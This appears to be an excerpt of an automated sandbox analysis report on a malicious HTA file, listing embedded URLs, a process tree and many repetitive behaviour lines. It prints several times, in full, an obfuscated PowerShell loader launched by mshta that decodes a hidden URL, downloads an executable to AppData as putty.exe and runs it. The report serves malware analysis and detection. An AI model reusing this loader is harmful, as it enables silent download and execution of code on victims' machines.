Source: powershell.exe, 00000001.00000002.1674324075.0000000007A80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1670355706.00000000050F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.1670355706.00000000050F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1670355706.00000000057C5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.1673133554.0000000006157000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li |
Source: powershell.exe, 00000001.00000002.1670355706.0000000005364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1670355706.000000000534E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1670355706.0000000005368000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.79/w64/putty.exe |
Source: powershell.exe, 00000001.00000002.1670355706.0000000005249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe |
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\epah.hta" | |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo; | |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo; | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo; | |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo; | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lxguvy($ultno, $ckftkhe){[io.file]::writeallbytes($ultno, $ckftkhe)};function zfthtje($ultno){if($ultno.endswith((afdaokcp @(31653,31707,31715,31715))) -eq $true){start-process (afdaokcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ultno}else{start-process $ultno}};function racmriket($myhor){$csapcdth = new-object (afdaokcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$ckftkhe = $csapcdth.downloaddata($myhor);return $ckftkhe};function afdaokcp($ssayqt){$iuqgibjjg=31607;$wnzmplqpi=$null;foreach($gecfq in $ssayqt){$wnzmplqpi+=[char]($gecfq-$iuqgibjjg)};return $wnzmplqpi};function weyxoo(){$hkmewvt = $env:appdata + '\';$lufdtejyb = racmriket (afdaokcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$suevb = $hkmewvt + 'putty.exe';lxguvy $suevb $lufdtejyb;zfthtje $suevb;;;;}weyxoo; | |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function lxguvy($ultno, $ckftkhe){[io.file]::writeallbytes($ultno, $ckftkhe)};function zfthtje($ultno){if($ultno.endswith((afdaokcp @(31653,31707,31715,31715))) -eq $true){start-process (afdaokcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ultno}else{start-process $ultno}};function racmriket($myhor){$csapcdth = new-object (afdaokcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$ckftkhe = $csapcdth.downloaddata($myhor);return $ckftkhe};function afdaokcp($ssayqt){$iuqgibjjg=31607;$wnzmplqpi=$null;foreach($gecfq in $ssayqt){$wnzmplqpi+=[char]($gecfq-$iuqgibjjg)};return $wnzmplqpi};function weyxoo(){$hkmewvt = $env:appdata + '\';$lufdtejyb = racmriket (afdaokcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$suevb = $hkmewvt + 'putty.exe';lxguvy $suevb $lufdtejyb;zfthtje $suevb;;;;}weyxoo; | Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo; | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation | Jump to behavior |
